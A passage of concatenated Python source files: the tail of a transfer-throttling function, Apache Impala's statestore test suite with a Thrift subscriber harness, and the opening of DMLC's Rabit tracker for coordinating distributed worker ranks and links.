release_waiting_requests_fifo(rse_id, activity=activity, account=account, count=to_release, direction=direction, session=session)
record_gauge('daemons.conveyor.throttler.release_waiting_requests.{activity}.{rse}.{account}', to_release, labels={'activity': activity, 'rse': rse_name, 'account': account})
elif accounts[account]['transfer'] > threshold_per_account:
logger(logging.DEBUG, "Throttler will not release %s waiting requests for activity %s, rse %s, account %s: It queued more transfers than its share " %
(accounts[account]['waiting'], activity, rse_name, account))
nr_accounts -= 1
to_release_per_account = math.ceil(to_release / nr_accounts)
elif accounts[account]['waiting'] < to_release_per_account:
logger(logging.DEBUG, "Throttler release %s waiting requests for activity %s, rse %s, account %s " % (accounts[account]['waiting'], activity, rse_name, account))
release_waiting_requests_fifo(rse_id, activity=activity, account=account, count=accounts[account]['waiting'], direction=direction, session=session)
record_gauge('daemons.conveyor.throttler.release_waiting_requests.{activity}.{rse}.{account}', accounts[account]['waiting'], labels={'activity': activity, 'rse': rse_name, 'account': account})
to_release = to_release - accounts[account]['waiting']
nr_accounts -= 1
to_release_per_account = math.ceil(to_release / nr_accounts)
else:
logger(logging.DEBUG, "Throttler release %s waiting requests for activity %s, rse %s, account %s " % (to_release_per_account, activity, rse_name, account))
release_waiting_requests_fifo(rse_id, activity=activity, account=account, count=to_release_per_account, direction=direction, session=session)
record_gauge('daemons.conveyor.throttler.release_waiting_requests.{activity}.{rse}.{account}', to_release_per_account, labels={'activity': activity, 'rse': rse_name, 'account': account})
to_release = to_release - to_release_per_account
nr_accounts -= 1
else:
logger(logging.DEBUG, "Throttler has done nothing for activity %s on rse %s (transfer > 0.8 * threshold)" % (activity, rse_name))
elif waiting > 0:
logger(logging.DEBUG, "Throttler remove limits(threshold: %s) and release all waiting requests for activity %s, rse %s" % (threshold, activity, rse_name))
delete_rse_transfer_limits(rse_id, activity=activity, session=session)
release_all_waiting_requests(rse_id, activity=activity, direction=direction, session=session)
record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.{activity}.{rse}', labels={'activity': activity, 'rse': rse_name})
|
test_statestore.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from collections import defaultdict
import json
import logging
import socket
import threading
import traceback
import time
import urllib2
import uuid
from Types.ttypes import TNetworkAddress
from thrift.protocol import TBinaryProtocol
from thrift.server.TServer import TServer
from thrift.transport import TSocket
from thrift.transport import TTransport
import StatestoreService.StatestoreSubscriber as Subscriber
import StatestoreService.StatestoreService as Statestore
from StatestoreService.StatestoreSubscriber import TUpdateStateResponse
from StatestoreService.StatestoreSubscriber import TTopicRegistration
from ErrorCodes.ttypes import TErrorCode
from Status.ttypes import TStatus
from tests.common.environ import specific_build_type_timeout
LOG = logging.getLogger('test_statestore')
# Tests for the statestore. The StatestoreSubscriber class is a skeleton implementation of
# a Python-based statestore subscriber with additional hooks to allow testing. Each
# StatestoreSubscriber runs its own server so that the statestore may contact it.
#
# All tests in this file may be run in parallel. They assume that a statestore instance is
# already running, and is configured with out-of-the-box defaults (as is the case in our
# usual test environment) which govern failure-detector timeouts etc.
#
# These tests do not yet provide sufficient coverage.
# If no topic entries, do the first and second subscribers always get a callback?
# Adding topic entries to a non-existent topic
# Test for from_version and to_version behavior
# Test with many concurrent subscribers
# Test that only the subscribed-to topics are sent
# Test that topic deletions take effect correctly.
def get_statestore_subscribers(host='localhost', port=25010):
response = urllib2.urlopen("http://{0}:{1}/subscribers?json".format(host, port))
page = response.read()
return json.loads(page)
STATUS_OK = TStatus(TErrorCode.OK)
DEFAULT_UPDATE_STATE_RESPONSE = TUpdateStateResponse(status=STATUS_OK, topic_updates=[],
skipped=False)
# IMPALA-3501: the timeout needs to be higher in code coverage builds
WAIT_FOR_FAILURE_TIMEOUT = specific_build_type_timeout(40, code_coverage_build_timeout=60)
class WildcardServerSocket(TSocket.TSocketBase, TTransport.TServerTransportBase):
"""Specialised server socket that binds to a random port at construction"""
def __init__(self, host=None, port=0):
self.host = host
self.handle = None
self.handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.handle.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.handle.bind(('localhost', 0))
_, self.port = self.handle.getsockname()
def listen(self):
self.handle.listen(128)
def accept(self):
client, addr = self.handle.accept()
result = TSocket.TSocket()
result.setHandle(client)
return result
class KillableThreadedServer(TServer):
"""Based on TServer.TThreadedServer, this server may be shutdown (by calling
shutdown()), after which no new connections may be made. Most of the implementation is
directly copied from Thrift."""
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.daemon = kwargs.get("daemon", False)
self.is_shutdown = False
self.port = self.serverTransport.port
def shutdown(self):
self.is_shutdown = True
self.serverTransport.close()
self.wait_until_down()
def wait_until_up(self, num_tries=10):
for i in xrange(num_tries):
cnxn = TSocket.TSocket('localhost', self.port)
try:
cnxn.open()
return
except Exception, e:
if i == num_tries - 1: raise
time.sleep(0.1)
def wait_until_down(self, num_tries=10):
for i in xrange(num_tries):
cnxn = TSocket.TSocket('localhost', self.port)
try:
cnxn.open()
time.sleep(0.1)
except Exception, e:
return
raise Exception("Server did not stop")
def serve(self):
self.serverTransport.listen()
while not self.is_shutdown:
client = self.serverTransport.accept()
# Since accept() can take a while, check again if the server is shutdown to avoid
# starting an unnecessary thread.
if self.is_shutdown: return
t = threading.Thread(target=self.handle, args=(client,))
t.setDaemon(self.daemon)
t.start()
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while not self.is_shutdown:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
print x
itrans.close()
otrans.close()
class StatestoreSubscriber(object):
"""A bare-bones subscriber skeleton. Tests should create a new StatestoreSubscriber(),
call start() and then register(). The subscriber will run a Thrift server on an unused
port, and after registration the statestore will call Heartbeat() and UpdateState() via
RPC. Tests can provide callbacks to the constructor that will be called during those
RPCs, and this is the easiest way to check that the statestore protocol is being
correctly followed. Tests should use wait_for_* methods to confirm that some event (like
an RPC call) has happened asynchronously.
Since RPC callbacks will execute on a different thread from the main one, any assertions
there will not trigger a test failure without extra plumbing. What we do is simple: any
exceptions during an RPC are caught and stored, and the check_thread_exceptions() method
will re-raise them.
The methods that may be called by a test deliberately return 'self' to allow for
chaining, see test_failure_detected() for an example of how this makes the test flow
more readable."""
def __init__(self, heartbeat_cb=None, update_cb=None):
self.heartbeat_event, self.heartbeat_count = threading.Condition(), 0
# Track the number of updates received per topic.
self.update_counts = defaultdict(lambda : 0)
# Variables to notify for updates on each topic.
self.update_event = threading.Condition()
self.heartbeat_cb, self.update_cb = heartbeat_cb, update_cb
self.subscriber_id = "python-test-client-%s" % uuid.uuid1()
self.exception = None
def Heartbeat(self, args):
"""Heartbeat RPC handler. Calls heartbeat callback if one exists."""
self.heartbeat_event.acquire()
try:
self.heartbeat_count += 1
response = Subscriber.THeartbeatResponse()
if self.heartbeat_cb is not None and self.exception is None:
try:
response = self.heartbeat_cb(self, args)
except Exception, e:
self.exception = e
self.heartbeat_event.notify()
finally:
self.heartbeat_event.release()
return response
def UpdateState(self, args):
"""UpdateState RPC handler. Calls update callback if one exists."""
self.update_event.acquire()
try:
for topic_name in args.topic_deltas: self.update_counts[topic_name] += 1
response = DEFAULT_UPDATE_STATE_RESPONSE
if self.update_cb is not None and self.exception is None:
try:
response = self.update_cb(self, args)
except Exception, e:
# Print the original backtrace so it doesn't get lost.
traceback.print_exc()
self.exception = e
self.update_event.notify()
finally:
self.update_event.release()
return response
def __init_server(self):
processor = Subscriber.Processor(self)
transport = WildcardServerSocket()
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
self.server = KillableThreadedServer(processor, transport, tfactory, pfactory,
daemon=True)
self.server_thread = threading.Thread(target=self.server.serve)
self.server_thread.setDaemon(True)
self.server_thread.start()
self.server.wait_until_up()
self.port = self.server.port
def __init_client(self):
self.client_transport = \
TTransport.TBufferedTransport(TSocket.TSocket('localhost', 24000))
self.protocol = TBinaryProtocol.TBinaryProtocol(self.client_transport)
self.client = Statestore.Client(self.protocol)
self.client_transport.open()
def check_thread_exceptions(self):
"""Checks if an exception was raised and stored in a callback thread"""
if self.exception is not None: raise self.exception
def kill(self):
"""Closes both the server and client sockets, and waits for the server to become
unavailable"""
self.client_transport.close()
self.server.shutdown()
return self
def start(self):
"""Starts a subscriber server, and opens a client to the statestore. Returns only when
the server is running."""
self.__init_server()
self.__init_client()
return self
def register(self, topics=None):
"""Call the Register() RPC"""
if topics is None: topics = []
request = Subscriber.TRegisterSubscriberRequest(
topic_registrations=topics,
subscriber_location=TNetworkAddress("localhost", self.port),
subscriber_id=self.subscriber_id)
response = self.client.RegisterSubscriber(request)
if response.status.status_code == TErrorCode.OK:
self.registration_id = response.registration_id
else:
raise Exception("Registration failed: %s, %s" %
(response.status.status_code,
'\n'.join(response.status.error_msgs)))
return self
def wait_for_heartbeat(self, count=None):
"""Waits for some number of heartbeats. If 'count' is provided, waits until the number
of heartbeats seen by this subscriber exceeds count, otherwise waits for one further
heartbeat."""
self.heartbeat_event.acquire()
try:
if count is not None and self.heartbeat_count >= count: return self
if count is None: count = self.heartbeat_count + 1
while count > self.heartbeat_count:
self.check_thread_exceptions()
last_count = self.heartbeat_count
self.heartbeat_event.wait(10)
if last_count == self.heartbeat_count:
raise Exception("Heartbeat not received within 10s (heartbeat count: %s)" %
self.heartbeat_count)
self.check_thread_exceptions()
return self
finally:
self.heartbeat_event.release()
def wait_for_update(self, topic_name, count=None):
"""Waits for some number of updates of 'topic_name'. If 'count' is provided, waits
until the number of updates seen by this subscriber exceeds count, otherwise waits
for one further update."""
self.update_event.acquire()
start_time = time.time()
try:
if count is not None and self.update_counts[topic_name] >= count: return self
if count is None: count = self.update_counts[topic_name] + 1
while count > self.update_counts[topic_name]:
self.check_thread_exceptions()
last_count = self.update_counts[topic_name]
self.update_event.wait(10)
if (time.time() > start_time + 10 and
last_count == self.update_counts[topic_name]):
raise Exception("Update not received for %s within 10s (update count: %s)" %
(topic_name, last_count))
self.check_thread_exceptions()
return self
finally:
self.update_event.release()
def wait_for_failure(self, timeout=WAIT_FOR_FAILURE_TIMEOUT):
"""Waits until this subscriber no longer appears in the statestore's subscriber
list. If 'timeout' seconds pass, throws an exception."""
start = time.time()
while time.time() - start < timeout:
subs = [s["id"] for s in get_statestore_subscribers()["subscribers"]]
if self.subscriber_id not in subs: return self
time.sleep(0.2)
raise Exception("Subscriber %s did not fail in %ss" % (self.subscriber_id, timeout))
class TestStatestore():
def make_topic_update(self, topic_name, key_template="foo", value_template="bar",
num_updates=1, clear_topic_entries=False):
topic_entries = [
Subscriber.TTopicItem(key=key_template + str(x), value=value_template + str(x))
for x in xrange(num_updates)]
return Subscriber.TTopicDelta(topic_name=topic_name,
topic_entries=topic_entries,
is_delta=False,
clear_topic_entries=clear_topic_entries)
def test_registration_ids_different(self):
"""Test that if a subscriber with the same id registers twice, the registration ID is
different"""
sub = StatestoreSubscriber()
sub.start().register()
old_reg_id = sub.registration_id
sub.register()
assert old_reg_id != sub.registration_id
def test_receive_heartbeats(self):
"""Smoke test to confirm that heartbeats get sent to a correctly registered
subscriber"""
sub = StatestoreSubscriber()
sub.start().register().wait_for_heartbeat(5)
def test_receive_updates(self):
"""Test that updates are correctly received when a subscriber alters a topic"""
topic_name = "topic_delta_%s" % uuid.uuid1()
def topic_update_correct(sub, args):
delta = self.make_topic_update(topic_name)
update_count = sub.update_counts[topic_name]
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
pass
elif update_count == 1:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
skipped=False)
elif update_count == 2:
assert len(args.topic_deltas) == 1, args.topic_deltas
assert args.topic_deltas[topic_name].topic_entries == delta.topic_entries
assert args.topic_deltas[topic_name].topic_name == delta.topic_name
elif update_count == 3:
# After the content-bearing update was processed, the next delta should be empty
assert len(args.topic_deltas[topic_name].topic_entries) == 0
return DEFAULT_UPDATE_STATE_RESPONSE
sub = StatestoreSubscriber(update_cb=topic_update_correct)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 3)
)
def test_filter_prefix(self):
topic_name = "topic_delta_%s" % uuid.uuid1()
def topic_update_correct(sub, args):
foo_delta = self.make_topic_update(topic_name, num_updates=1)
bar_delta = self.make_topic_update(topic_name, num_updates=2, key_template='bar')
update_count = sub.update_counts[topic_name]
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
pass
elif update_count == 1:
# Send some values with both prefixes.
return TUpdateStateResponse(status=STATUS_OK,
topic_updates=[foo_delta, bar_delta],
skipped=False)
elif update_count == 2:
# We should only get the 'bar' entries back.
assert len(args.topic_deltas) == 1, args.topic_deltas
assert args.topic_deltas[topic_name].topic_entries == bar_delta.topic_entries
assert args.topic_deltas[topic_name].topic_name == bar_delta.topic_name
elif update_count == 3:
# Send some more updates that only have 'foo' prefixes.
return TUpdateStateResponse(status=STATUS_OK,
topic_updates=[foo_delta],
skipped=False)
elif update_count == 4:
# We shouldn't see any entries from the above update, but we should still see
# the version number change due to the new entries in the topic.
assert len(args.topic_deltas[topic_name].topic_entries) == 0
assert args.topic_deltas[topic_name].from_version == 3
assert args.topic_deltas[topic_name].to_version == 4
elif update_count == 5:
# After the content-bearing update was processed, the next delta should be empty
assert len(args.topic_deltas[topic_name].topic_entries) == 0
assert args.topic_deltas[topic_name].from_version == 4
assert args.topic_deltas[topic_name].to_version == 4
return DEFAULT_UPDATE_STATE_RESPONSE
sub = StatestoreSubscriber(update_cb=topic_update_correct)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False,
filter_prefix="bar")
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 5)
)
def test_update_is_delta(self):
"""Test that the 'is_delta' flag is correctly set. The first update for a topic should
always not be a delta, and so should all subsequent updates until the subscriber says
it has not skipped the update."""
topic_name = "test_update_is_delta_%s" % uuid.uuid1()
def check_delta(sub, args):
update_count = sub.update_counts[topic_name]
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
pass
elif update_count == 1:
assert args.topic_deltas[topic_name].is_delta == False
delta = self.make_topic_update(topic_name)
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
skipped=False)
elif update_count == 2:
assert args.topic_deltas[topic_name].is_delta == False
elif update_count == 3:
assert args.topic_deltas[topic_name].is_delta == True
assert len(args.topic_deltas[topic_name].topic_entries) == 0
assert args.topic_deltas[topic_name].to_version == 1
return DEFAULT_UPDATE_STATE_RESPONSE
sub = StatestoreSubscriber(update_cb=check_delta)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 3)
)
def test_skipped(self):
"""Test that skipping an update causes it to be resent"""
topic_name = "test_skipped_%s" % uuid.uuid1()
def check_skipped(sub, args):
# Ignore responses that don't contain our topic.
if topic_name not in args.topic_deltas: return DEFAULT_UPDATE_STATE_RESPONSE
update_count = sub.update_counts[topic_name]
if update_count == 1:
update = self.make_topic_update(topic_name)
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[update],
skipped=False)
# All subsequent updates: set skipped=True and expect the full topic to be resent
# every time
assert args.topic_deltas[topic_name].is_delta == False
assert len(args.topic_deltas[topic_name].topic_entries) == 1
return TUpdateStateResponse(status=STATUS_OK, skipped=True)
sub = StatestoreSubscriber(update_cb=check_skipped)
reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 3)
)
def test_failure_detected(self):
sub = StatestoreSubscriber()
topic_name = "test_failure_detected"
reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 1)
.kill()
.wait_for_failure()
)
def test_hung_heartbeat(self):
"""Test for IMPALA-1712: If heartbeats hang (which we simulate by sleeping for five
minutes) the statestore should time them out every 3s and then eventually fail after
40s (10 times (3 + 1), where the 1 is the inter-heartbeat delay)"""
sub = StatestoreSubscriber(heartbeat_cb=lambda sub, args: time.sleep(300))
topic_name = "test_hung_heartbeat"
reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
(
sub.start()
.register(topics=[reg])
.wait_for_update(topic_name, 1)
.wait_for_failure(timeout=60)
)
def test_topic_persistence(self):
"""Test that persistent topic entries survive subscriber failure, but transent topic
entries are erased when the associated subscriber fails"""
topic_id = str(uuid.uuid1())
persistent_topic_name = "test_topic_persistence_persistent_%s" % topic_id
transient_topic_name = "test_topic_persistence_transient_%s" % topic_id
def add_entries(sub, args):
# None of, one or both of the topics may be in the update.
updates = []
if (persistent_topic_name in args.topic_deltas and
sub.update_counts[persistent_topic_name] == 1):
updates.append(self.make_topic_update(persistent_topic_name))
if (transient_topic_name in args.topic_deltas and
sub.update_counts[transient_topic_name] == 1):
updates.append(self.make_topic_update(transient_topic_name))
if len(updates) > 0:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=updates,
skipped=False)
return DEFAULT_UPDATE_STATE_RESPONSE
def check_entries(sub, args):
# None, one, or both of the topics may be in the update.
if (persistent_topic_name in args.topic_deltas and
sub.update_counts[persistent_topic_name] == 1):
assert len(args.topic_deltas[persistent_topic_name].topic_entries) == 1
# Statestore should not send deletions when the update is not a delta, see
# IMPALA-1891
assert args.topic_deltas[persistent_topic_name].topic_entries[0].deleted == False
if (transient_topic_name in args.topic_deltas and
sub.update_counts[transient_topic_name] == 1):
assert len(args.topic_deltas[transient_topic_name].topic_entries) == 0
return DEFAULT_UPDATE_STATE_RESPONSE
reg = [TTopicRegistration(topic_name=persistent_topic_name, is_transient=False),
TTopicRegistration(topic_name=transient_topic_name, is_transient=True)]
sub = StatestoreSubscriber(update_cb=add_entries)
(
sub.start()
.register(topics=reg)
.wait_for_update(persistent_topic_name, 2)
.wait_for_update(transient_topic_name, 2)
.kill()
.wait_for_failure()
)
sub2 = StatestoreSubscriber(update_cb=check_entries)
(
sub2.start()
.register(topics=reg)
.wait_for_update(persistent_topic_name, 1)
.wait_for_update(transient_topic_name, 1)
)
def test_update_with_clear_entries_flag(self):
"""Test that the statestore clears all topic entries when a subscriber
sets the clear_topic_entries flag in a topic update message (IMPALA-6948)."""
topic_name = "test_topic_%s" % str(uuid.uuid1())
def add_entries(sub, args):
updates = []
if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 1):
updates.append(self.make_topic_update(topic_name, num_updates=2,
key_template="old"))
if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 2):
updates.append(self.make_topic_update(topic_name, num_updates=1,
key_template="new", clear_topic_entries=True))
if len(updates) > 0:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=updates,
skipped=False)
return DEFAULT_UPDATE_STATE_RESPONSE
def check_entries(sub, args):
if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 1):
assert len(args.topic_deltas[topic_name].topic_entries) == 1
assert args.topic_deltas[topic_name].topic_entries[0].key == "new0"
return DEFAULT_UPDATE_STATE_RESPONSE
reg = [TTopicRegistration(topic_name=topic_name, is_transient=False)]
sub1 = StatestoreSubscriber(update_cb=add_entries)
(
sub1.start()
.register(topics=reg)
.wait_for_update(topic_name, 1)
.kill()
.wait_for_failure()
.start()
.register(topics=reg)
.wait_for_update(topic_name, 2)
)
sub2 = StatestoreSubscriber(update_cb=check_entries)
(
sub2.start()
.register(topics=reg)
.wait_for_update(topic_name, 2)
)
def test_heartbeat_failure_reset(self):
"""Regression test for IMPALA-6785: the heartbeat failure count for the subscriber ID
should be reset when it resubscribes, not after the first successful heartbeat. Delay
the heartbeat to force the topic update to finish first."""
sub = StatestoreSubscriber(heartbeat_cb=lambda sub, args: time.sleep(0.5))
topic_name = "test_heartbeat_failure_reset"
reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
sub.start()
sub.register(topics=[reg])
LOG.info("Registered with id {0}".format(sub.subscriber_id))
sub.wait_for_heartbeat(1)
sub.kill()
LOG.info("Killed, waiting for statestore to detect failure via heartbeats")
sub.wait_for_failure()
# IMPALA-6785 caused only one topic update to be sent. Wait for multiple updates to
# be received to confirm that the subsequent updates are being scheduled repeatedly.
target_updates = sub.update_counts[topic_name] + 5
sub.start()
sub.register(topics=[reg])
LOG.info("Re-registered with id {0}, waiting for update".format(sub.subscriber_id))
sub.wait_for_update(topic_name, target_updates)
def test_min_subscriber_topic_version(self):
self._do_test_min_subscriber_topic_version(False)
def test_min_subscriber_topic_version_with_straggler(self):
self._do_test_min_subscriber_topic_version(True)
def _do_test_min_subscriber_topic_version(self, simulate_straggler):
"""Implementation of test that the 'min_subscriber_topic_version' flag is correctly
set when requested. This test runs two subscribers concurrently and tracks the
minimum version each has processed. If 'simulate_straggler' is true, one subscriber
rejects updates so that its version is not advanced."""
topic_name = "test_min_subscriber_topic_version_%s" % uuid.uuid1()
# This lock is held while processing the update to protect last_to_versions.
update_lock = threading.Lock()
last_to_versions = {}
TOTAL_SUBSCRIBERS = 2
def callback(sub, args, is_producer, sub_name):
"""Callback for subscriber to verify min_subscriber_topic_version behaviour.
If 'is_producer' is true, this acts as the producer, otherwise it acts as the
consumer. 'sub_name' is a name used to index into last_to_versions."""
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
return DEFAULT_UPDATE_STATE_RESPONSE
with update_lock:
LOG.info("{0} got update {1}".format(sub_name,
repr(args.topic_deltas[topic_name])))
LOG.info("Versions: {0}".format(last_to_versions))
to_version = args.topic_deltas[topic_name].to_version
from_version = args.topic_deltas[topic_name].from_version
min_subscriber_topic_version = \
args.topic_deltas[topic_name].min_subscriber_topic_version
if is_producer:
assert min_subscriber_topic_version is not None
assert (to_version == 0 and min_subscriber_topic_version == 0) or\
min_subscriber_topic_version < to_version,\
"'to_version' hasn't been created yet by this subscriber."
# Only validate version once all subscribers have processed an update.
if len(last_to_versions) == TOTAL_SUBSCRIBERS:
min_to_version = min(last_to_versions.values())
assert min_subscriber_topic_version <= min_to_version,\
"The minimum subscriber topic version seen by the producer cannot get " +\
"ahead of the minimum version seem by the consumer, by definition."
assert min_subscriber_topic_version >= min_to_version - 2,\
"The min topic version can be two behind the last version seen by " + \
"this subscriber because the updates for both subscribers are " + \
"prepared in parallel and because it's possible that the producer " + \
"processes two updates in-between consumer updates. This is not " + \
"absolute but depends on updates not being delayed a large amount."
else:
# Consumer did not request topic version.
assert min_subscriber_topic_version is None
# Check the 'to_version' and update 'last_to_versions'.
last_to_version = last_to_versions.get(sub_name, 0)
if to_version > 0:
# Non-empty update.
assert from_version == last_to_version
# Stragglers should accept the first update then skip later ones.
skip_update = simulate_straggler and not is_producer and last_to_version > 0
if not skip_update: last_to_versions[sub_name] = to_version
if is_producer:
delta = self.make_topic_update(topic_name)
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
skipped=False)
elif skip_update:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[], skipped=True)
else:
return DEFAULT_UPDATE_STATE_RESPONSE
# Two concurrent subscribers: one pushes out updates and checks the minimum
# version, the other just consumes the updates.
def producer_callback(sub, args): return callback(sub, args, True, "producer")
def consumer_callback(sub, args): return callback(sub, args, False, "consumer")
consumer_sub = StatestoreSubscriber(update_cb=consumer_callback)
consumer_reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
producer_sub = StatestoreSubscriber(update_cb=producer_callback)
producer_reg = TTopicRegistration(topic_name=topic_name, is_transient=True,
populate_min_subscriber_topic_version=True)
NUM_UPDATES = 6
(
consumer_sub.start()
.register(topics=[consumer_reg])
)
(
producer_sub.start()
.register(topics=[producer_reg])
.wait_for_update(topic_name, NUM_UPDATES)
)
consumer_sub.wait_for_update(topic_name, NUM_UPDATES)
|
tracker.py
|
"""
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements
from __future__ import absolute_import
import os
import sys
import socket
import struct
import subprocess
import argparse
import time
import logging
from threading import Thread
from requests import get
class ExSocket(object):
"""
Extension of socket to handle recv and send of special data
"""
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return b''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s.encode())
def recvstr(self):
slen = self.recvint()
return self.recvall(slen).decode()
# magic number used to verify existence of data
kMagic = 0xff99
def get_some_ip(host):
return socket.getaddrinfo(host, None)[0][4][0]
def get_family(addr):
return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = get_some_ip(s_addr[0])
logging.debug("Created SlaveEntry for node: %s" % self.host)
magic = slave.recvint()
assert magic == kMagic, 'invalid magic number=%d from %s' % (magic, self.host)
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
self.wait_accept = 0
self.port = None
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev != -1 and rprev != rank:
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext != -1 and rnext != rank:
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for _ in range(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
# all connections were successfully set up
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=9091, port_end=9999):
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind((hostIP, port))
self.port = port
break
except socket.error as e:
if e.errno in [98, 48]:
continue
else:
raise
sock.listen(256)
self.sock = sock
self.hostIP = hostIP
self.thread = None
self.start_time = None
self.end_time = None
self.nslave = nslave
logging.info('start listen on %s:%d', hostIP, self.port)
def __del__(self):
self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank // 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def slave_envs(self):
"""
get environment variables for slaves
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) // 2 - 1
return tree_map, parent_map
def get_star(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = [0] if r != 0 else [worker for worker in range(1, nslave)]
parent_map[r] = 0 if r != 0 else -1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if len(cset) == 0:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
get the link map; this is a bit hacky and calls for a better algorithm
to place similar nodes together
"""
tree_map, parent_map = self.get_star(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0 : 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
